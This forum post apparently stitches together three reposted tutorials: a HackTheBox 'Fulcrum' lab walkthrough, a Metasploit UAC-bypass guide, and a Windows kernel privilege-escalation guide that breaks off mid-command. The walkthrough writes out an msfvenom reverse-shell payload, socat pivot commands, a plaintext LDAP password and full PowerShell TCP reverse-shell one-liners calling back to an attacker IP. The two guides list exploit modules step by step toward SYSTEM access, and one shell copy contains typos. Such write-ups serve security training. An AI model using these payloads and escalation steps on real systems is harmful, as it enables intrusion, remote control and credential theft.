05-14-2020, 09:42 AM
| 0 | 0 | ||
Level: Expert
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online available therefore they have static IP and IP of Fulcrum is 10.10.10.62 so let’s begin with nmap port enumeration.
We need to do a nmap version scan so that we can get better information about the open ports.
nmap -sV -p- 10.10.10.62
1
nmap -sV -p- 10.10.10.62
From the given below image, you can observe that we find ports 4, 22, 80, 88, 9999, 56423 are open.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-WhQvoDGkLtw/W5_XaMS6yOI/AAAAAAAAaR4/DFY_wmuMK_MP2aIZwjFi2Eb8XdCOlFS8gCEwYBhgL/s1600/1.png?w=687&ssl=1)
As port 4 is running Nginx server, the Nginx server hosts the webpage to view it we will open it in our browser to find a page that says it is under maintenance along with a link that says try again.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-XLrC386evRE/W5_Xdv4OOsI/AAAAAAAAaSA/F2XVpDUfRrUkBhZLkdQ_SMYdOXNnJF9eACEwYBhgL/s1600/2.png?w=687&ssl=1)
We will click on the link and find that there is a page parameter that we found to be vulnerable to LFI.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-GLu3m520O-Q/W5_Xi9bTAbI/AAAAAAAAaSA/Cbt0xQzeTkYcq_gz5oqLD76lp2eTcd3uQCEwYBhgL/s1600/3.png?w=687&ssl=1)
Back to the nmap scan we also saw that port 80 is running Nginx server, we open it in our browser and find a server error This was proved to be a dead end
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-X5tuPlDS3L8/W5_XjVkd2EI/AAAAAAAAaSM/mV0vJOVreE86YlkovARy1U7bKKflCBRqwCEwYBhgL/s1600/4.png?w=687&ssl=1)
Let’s try our lock on Port 88 which I also running nginx server, we open the IP address in our browser on port 88 and find a phpmyadmin page. As we don’t have any hint or clue for the credentials, we will have to try another port.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-TTxEiikeqVc/W5_Xjv9YBsI/AAAAAAAAaSA/WOeCQJuPQkcfRbn6Qhofz6Mf_jRTiycZACEwYBhgL/s1600/5.png?w=687&ssl=1)
Port 9999 is running nginx server, we open the IP address on port 9999 in our browser and find a pfsense login page.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-bcQPXpr5rT8/W5_Xj2xLewI/AAAAAAAAaSE/6KPevOsqSqwdISAbrWH1QZ0jPlYkdjx0wCEwYBhgL/s1600/6.png?w=687&ssl=1)
Port 56423 is running nginx, so visiting the service on Port 56423 brings us to what appears to be some sort of “API” endpoint as we receive a JSON response.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ZIA0nOBncDA/W5_XjwfLIQI/AAAAAAAAaSA/Dd_N6VMlkxUMOwqkBq7Ls18KsF6japn2QCEwYBhgL/s1600/7.png?w=687&ssl=1)
It is possible that this page is vulnerable to XXE, so we create a shell so that can upload and execute it on the target machine.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw > shell.php
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw > shell.php
After creating a shell, we start an HTTP server on our system using python.
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-YZmoHirkkrc/W5_XkETuNaI/AAAAAAAAaSM/qsS6I4LFw801cITd05p-hgdCj16OXHX6ACEwYBhgL/s1600/8.png?w=687&ssl=1)
After creating the shell, we set up our listener using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-oVZtP0nyDcc/W5_XkaU3v7I/AAAAAAAAaSI/QK4QSzD3bPQuNI_NQ7rd6p4u5IE05iiJQCEwYBhgL/s1600/9.png?w=687&ssl=1)
Using BurpSuite, we will capture the request, and upload the php shell. But we are unable to get a reverse shell.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-79HXnPyUs6g/W5_XaNh6unI/AAAAAAAAaR4/uv5LrnmODDQT67rhvAyAuoAMcsYpfDxLwCEwYBhgL/s1600/10.png?w=687&ssl=1)
We then try to exploit the page we find on port 4 using RFI and were able to successfully get a reverse shell.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-_p9eb51dS4c/W5_XaMk7uWI/AAAAAAAAaSA/exTd2ZKMacwwf6CMdjXo8zcLpUfcHXroQCEwYBhgL/s1600/11.png?w=687&ssl=1)
We get the reverse shell, but it was not a proper shell. We will spawn a tty shell using python.
python -c "import pty; pty.spawn('/bin/bash')"
1
python -c "import pty; pty.spawn('/bin/bash')"
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Xv4oLu85YEs/W5_XbIyIGoI/AAAAAAAAaR0/cCMQkBhaCdMY7wmkfUvOZnLN439_PIvtACEwYBhgL/s1600/12.png?w=687&ssl=1)
After spawning a tty shell, we find a file called ‘Fulcrum_Upload_to_Corp.ps1’ we open and find it is a PowerShell script to encrypt the password it goes through some functions.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-EvZjCL-esBo/W5_Xa0g_L9I/AAAAAAAAaSM/SITV6RyxOawmRThzCPTZPGNC3frHVsNlwCEwYBhgL/s1600/13.png?w=687&ssl=1)
Now we copy the content of the script and paste it in a site called
[To see content please register here]
We do this in hope to extract the logon credentials on the server.![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-DdD34NV5jso/W5_XbNRU2qI/AAAAAAAAaR8/L8aHzWw_SYEN6LxXfiWTewQsfpq2HPa5gCEwYBhgL/s1600/14.png?w=687&ssl=1)
Enumerating further into the system we find a file that contains an interesting internal IP address:192.168.122.228. Further what to do is that we will divert our attention to enumerate this IP address.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ngxLnoTPeBA/W5_Xbrjv87I/AAAAAAAAaR4/6vdhnPEUQoswXgj-z4COm-bWXBhNDeMBACEwYBhgL/s1600/15.png?w=687&ssl=1)
We scan the port of the IP address using netcat. After completion of the scan, we find that port 5986 is open.
nc -zv 192.168.122.228 1-65535
1
nc -zv 192.168.122.228 1-65535
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-w-EAZhvqY7E/W5_XcGuNCvI/AAAAAAAAaSE/uJ2fw53j04AGNDUVHO3huNdpyx_02FmFwCEwYBhgL/s1600/16.png?w=687&ssl=1)
We download socat into the target machine. Socat is a very useful tool which helps us to pivot our way into another network.
cd /tmp
wget
[To see content please register here]
./socat tcp-listen:60217,reuseaddr,fork tcp:192.168.122.228:5986 &1
2
3
cd /tmp
wget
[To see content please register here]
./socat tcp-listen:60217,reuseaddr,fork tcp:192.168.122.228:5986 &![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-7U2zsTQcXAQ/W5_Xch7gA2I/AAAAAAAAaSI/hLMj7qAlG9soIy52IJlqrLSSDjWLEaXNgCEwYBhgL/s1600/18.png?w=687&ssl=1)
We relay the connection to port 60217 on 10.10.10.62 using socat.
socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:60217
1
socat tcp-listen:5986,reuseaddr,fork tcp:10.10.10.62:60217
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-QRP2yFmblfY/W5_XdPLripI/AAAAAAAAaSE/BqB9yj1FmQMBxsbpbnaGbMJoWEEk1wh9gCEwYBhgL/s1600/19.png?w=687&ssl=1)
We will now use PowerShell on our windows machine to connect to the kali machine that will allow us to directly connect to the target machine. After connecting we take a look at the content of the default directory we are in and find a few files called “CheckFileServer.ps1”, “Invoke-PsExec.ps1” and “user.txt”.
Enter-PSSession -ComputerName 192.168.199.130 -Credential $5 -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
dir
type user.txt
type CheckFileServer.ps1
1
2
3
4
Enter-PSSession -ComputerName 192.168.199.130 -Credential $5 -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)
dir
type user.txt
type CheckFileServer.ps1
![[Image: 20.PNG?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-dc67rdhVchw/W5_XeIct2II/AAAAAAAAaR8/-I69rkHKk8Yh6Hbju-yXYIp60MudrYfXgCEwYBhgL/s1600/20.PNG?w=687&ssl=1)
Enumerating through the directories inside default IIS directory, we open web.config file and find LDAP login credentials.
![[Image: 21.PNG?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-dIaUcaryEio/W5_Xe8aCaAI/AAAAAAAAaR8/xmqJrHa2K-gJSGswEtl1r9vrhU65UA56wCEwYBhgL/s1600/21.PNG?w=687&ssl=1)
Let’s create an LDAP query, and find two CNs: DC and File. We create a query about these CN’s and find some credentials.
(New-Object adsisearcher((New-Object adsi("LDAP://dc.fulcrumlocal”, "fulcrum\ldap","PasswordForSearch123!")),(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
1
(New-Object adsisearcher((New-Object adsi("LDAP://dc.fulcrumlocal”, "fulcrum\ldap","PasswordForSearch123!")),(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
![[Image: 22.PNG?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-YfCucyZbaiY/W5_XfZP5RwI/AAAAAAAAaSA/jxhGV2EOnLkAi5lFNjuS42w0WtKKcOauACEwYBhgL/s1600/22.PNG?w=687&ssl=1)
We create a script to get a the user.txt and were successfully able to get the first flag. We do not have permission to get multiple PS hop.
Invoke-Command -CommandName file.fulcrm.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { type C:\User\Btables\Desktop\user.txt }
Invoke-Command -ComputerName file.fulcrum.local -Credentail fulcrum.local\btables -Port 5985 -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream =$client.GertStream(); [byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes.0 $bytes.Lenght)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘>’;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Lenght);$stream.Flush();$client.Close() }
1
2
Invoke-Command -CommandName file.fulcrm.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { type C:\User\Btables\Desktop\user.txt }
Invoke-Command -ComputerName file.fulcrum.local -Credentail fulcrum.local\btables -Port 5985 -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream =$client.GertStream(); [byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes.0 $bytes.Lenght)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘>’;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Lenght);$stream.Flush();$client.Close() }
![[Image: 23.PNG?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-TYLXKt4X39E/W5_XfoGwo5I/AAAAAAAAaR4/fA22FbAjKy48OKP5uZa4-Lz_KC28z3SoQCEwYBhgL/s1600/23.PNG?w=687&ssl=1)
We set up our listener using netcat and get our reverse shell. We check for the available files and find a file called user.txt. We open it and find the first flag.
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-WFi5fqfk06s/W5_XgDmSRoI/AAAAAAAAaSA/eSPRudIA7Ho_tmjVMGSb5M0JQWVwnNIoACEwYBhgL/s1600/24.png?w=687&ssl=1)
Now as we have a shell on the file server. We will use the credentials we found earlier to get access to the DC server.
net use \\dc.fulcrum.local\netlogon /user:fulcrum\btables ++FileServerLogon12345++
1
net use \\dc.fulcrum.local\netlogon /user:fulcrum\btables ++FileServerLogon12345++
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ew0YQaOrchU/W5_XgrRzKfI/AAAAAAAAaSA/E_8K3OZUvuYUnodxGDdYtTvlCcJIh_yMACEwYBhgL/s1600/25.png?w=687&ssl=1)
When we will connect to DC server we find multiple ps1 scripts that contain credentials which will further help us to get access on the server.
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-cym9au1ixVQ/W5_XhOh5oBI/AAAAAAAAaSI/FwYjyZYgUWcMxhnXt5r0W3wCVn5Yp_8vwCEwYBhgL/s1600/26.png?w=687&ssl=1)
We create a script to check all right credentials in the file.
![[Image: 27.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-aPx4mjmblFM/W5_Xh7O4FqI/AAAAAAAAaR4/WFugUwQdbxI0avR9mM-qfv6EIPAd1tdVACEwYBhgL/s1600/27.png?w=687&ssl=1)
Now we create a script to get a shell on the domain controller server.
Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
1
Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }
![[Image: 28.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-3eRc58xPokQ/W5_XiWc1SmI/AAAAAAAAaSE/gY-NIvvvHSQHCbkhhVDXpNYZqJAMXAppwCEwYBhgL/s1600/28.png?w=687&ssl=1)
When we run the script, we get a pop on the windows screen that asks for a password. We use the password we find earlier with the help of a script.
![[Image: 29.PNG?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-FiK6UxwE8vY/W5_XixGB4VI/AAAAAAAAaSI/MxUNiThpNeMtpEvvk0v4gPXYSpobqR26ACEwYBhgL/s1600/29.PNG?w=687&ssl=1)
We set up the listener and wait for the reverse shell. After getting the reverse shell in c:\Users\Administrator\Desktop we find a file called root.txt, we take a look at the content of the file and find our 2nd flag.
nc -lvp 53
1
nc -lvp 53
![[Image: 35.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-xty2ZJnu1zU/W5_XjFTMIBI/AAAAAAAAaR8/0Vr47vra3_IroEBXw4m557ISS3TsQE1LQCEwYBhgL/s1600/35.png?w=687&ssl=1)
In this Post, we are shedding light on User Account Control shortly known as UAC. We will also look at how it can potentially protect you from malicious software and ignoring UAC prompt can trouble your system.
Table of Content
Introduction to UAC
- What is UAC?
- Working of UAC
- Windows Escalate UAC Protection Bypass
- Windows Escalate UAC Protection Bypass (In Memory Injection)
- Windows UAC Protection Bypass (Via FodHelper Registry Key)
- Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
- Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
What is User Account Control?
A well-structured User Account Control introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is foreseen and requires a minimal effort.
In other words, it is a security feature of Windows which supports I preventing unauthorized modifications to the operating system UAC makes sure that the certain changes are made only with authorization from the administrator. If the changes are not permitted by the administrator, they are not executed, and Windows remains unchanged.
How does UAC work?
UAC works by preventing a program from carrying out any tasks which involve system changes/specific tasks. The operations which will not work unless the process attempting to carry them out is running with administrator rights. If you run a program as administrator, it will have more privileges since it would be “elevated”, compared to the programs running which are not running as administrator.
Some things which cannot be done without administrator rights:
- Registry modifications (if the registry key is under e.g. HKEY_LOCAL_MACHINE (since it affects more than one user) it will be read-only)
- Loading a device driver
- DLL injection
- Modifying system time (clock)
- Modifying User Account Control settings (via Registry, it can be enabled/disabled but you need the correct privileges to do this)
- Modify protected directories (e.g. Windows folder, Program Files)
- Scheduled tasks (e.g. to auto-start with administrator privileges)
[To see content please register here]
Techniques
Firstly exploit the target machine to obtain the meterpreter. Once you get the meterpreter session 1 then type the following command to check system authority and privileges.
getsystem
getuid
1
2
getsystem
getuid
If you don’t have system/admin authorities and privileges. Then you should go for bypass UAC Protection of the targeted system.
Windows Escalate UAC Protection Bypass
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.
msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit
1
2
3
msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
1
2
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command, you will get access of command prompt with administrator privilege.
![[Image: 1.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-MLj6M5z9x50/W53gwey6pSI/AAAAAAAAaPU/W9QdjuMLjK4xkp-t9OT-QruLs9KQOjVPACLcBGAs/s1600/1.png?w=687)
Windows Escalate UAC Protection Bypass (In Memory Injection)
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit
1
2
3
msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
1
2
getsystem
getuid
Ultimately you will get NT AUTHORITY\SYSTEM Privilege, now if you will run “shell” command, you will get access of command prompt with administrator privilege.
![[Image: 3.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-wtjO0vwANDs/W53gwu8_-bI/AAAAAAAAaPY/b0SmuIsr6HAU_O6hSArtTi_BEO3YQojPQCLcBGAs/s1600/3.png?w=687)
Windows UAC Protection Bypass (Via FodHelper Registry Key)
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit
1
2
3
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
1
2
getsystem
getuid
Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command, you will get access of command prompt with administrator privilege.
![[Image: 4.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-iH5Inc5GTg4/W53gw36Bo3I/AAAAAAAAaPc/PQpLFtETqMUEZrF-efd7TS6LMW9VGiDXwCEwYBhgL/s1600/4.png?w=687)
Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit
1
2
3
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit
From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
1
2
getsystem
getuid
And again you will get NT AUTHORITY\SYSTEM Privilege.
![[Image: 5.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-enb14J_C8LA/W53gxPsr1DI/AAAAAAAAaPg/g2EUJutqTmM7MOYKK5gZDk-qXSWb9HMewCEwYBhgL/s1600/5.png?w=687)
Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit
1
2
3
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit
From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.
getsystem
getuid
1
2
getsystem
getuid
Finally, you will get NT AUTHORITY\SYSTEM Privilege, now if you will again run “shell” command then you will get access of command prompt with administrator privilege and this way we can help of Metasploit post exploit to bypass UAC protection.
![[Image: 6.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-E9UGfeePMbA/W53gxgN00NI/AAAAAAAAaPk/tsVTjUcnXJgqZKhdFGvE5p6t-WwUXDo-ACEwYBhgL/s1600/6.png?w=687)
Hello Friends!! In our previous
[To see content please register here]
we had discussed “Vectors of Windows Privilege Escalation using the automated script” and today we are demonstrating the Windows privilege escalation via Kernel exploitation methodologies. For this purpose, we will utilize an in-built Metasploit module known as Local Exploit Suggester. The objective of this suggested is to just identify what parts of a system can be exploitable and to give us an insight on the best matching possible exploits available, which can be further utilized to elevate the privileges.Table of content
- Windows-Exploit-suggester
- Windows ClientCopyImage Win32k Exploit
- Windows TrackPopupMenu Win32k NULL Pointer Dereference
- Windows SYSTEM Escalation via KiTrap0D
- Windows Escalate Task Scheduler XML Privilege Escalation
- MS16-016 mrxdav.sys WebDav Local Privilege Escalation
- EPATHOBJ::pprFlattenRec Local Privilege Escalation
- MS13-053: NTUserMessageCall Win32k Kernel Pool Overflow
- MS16-032 Secondary Logon Handle Privilege Escalation
- RottenPotato
The Metasploit in-built module suggests various local exploits that can be used to perform Privilege escalation and provides a suggestion based on the architecture, platform (i.e the operating system it’s being run on), session type and required default options. It saves our time as we don’t have to manually search around for local exploits until none of the options provided works.
It is also significant to note that, not ALL of these listed local exploits will be fired.
Usage
Note: For using the local exploit suggester, we must already have a Meterpreter session opened for our target machine. However, before running the Local Exploit suggester we need to put our existing active Meterpreter session to the background (CTRL + Z)
Below is the example of the same, let’s say our existing active Meterpreter session is 1
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit
1
2
3
4
use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit
As you can observe it has suggested some post exploits against which the target is vulnerable and that can provide higher-privilege shell.
![[Image: 0.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-na8X7n-ydJE/W5X9dDvIgoI/AAAAAAAAaMc/IT2GTlae1xgJXD-7wuDlItWe5ji5enMPACEwYBhgL/s1600/0.png?w=687)
Windows ClientCopyImage Win32k Exploit
Vulnerabilities in Windows Kernel-Mode Drivers could allow elevation of privilege. This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, Windows 2008 R2 SP1 x64.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 1.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-hz_b--b-J58/W5X9dN3MTDI/AAAAAAAAaNQ/zlcnw5C4xBcI5knhNQbzI33PbF4dJ-WgACEwYBhgL/s1600/1.png?w=687)
Windows TrackPopupMenu Win32k NULL Pointer Dereference
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution.
This module has been tested on Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1 Windows Server 2008 32bits and Windows Server 2008 R2 SP1 64 bits.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 2.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-PkWBUa6gBt0/W5X9eP4yJlI/AAAAAAAAaNg/3ObWMMVKhrsv5kCj1cN58zmdNWdB175YgCEwYBhgL/s1600/2.png?w=687)
Windows SYSTEM Escalation via KiTrap0D
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
This module has been tested on vulnerable builds of Windows Server 2003, Windows Server 2008, Windows 7, XP for 32-bit Systems.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 3.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-WwQmpHxalZg/W5X9eeDovpI/AAAAAAAAaNc/qjBIxBGwPTAfhcB13aUc8ul2rErH9NmgwCEwYBhgL/s1600/3.png?w=687)
Windows Escalate Task Scheduler XML Privilege Escalation
This Vulnerability in Task Scheduler could allow elevation of privileges
This security updates resolves a publicly disclosed vulnerability in Windows Task Scheduler. The vulnerability could allow elevation of privilege if an attacker logged on to an affected system and ran a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.
This module has been tested on vulnerable builds of Windows Vista, Windows 7, Windows Server 2008 x64 and x86
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 4.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-CnW1hzF17LU/W5X9eoyi9LI/AAAAAAAAaNo/a2bjptvbuGENwiM391vt_LMF_O54IiqIgCEwYBhgL/s1600/4.png?w=687)
MS16-016 mrxdav.sys WebDav Local Privilege Escalation
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
This module has been tested on the vulnerable build of Windows 7 SP1, x86 architecture
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
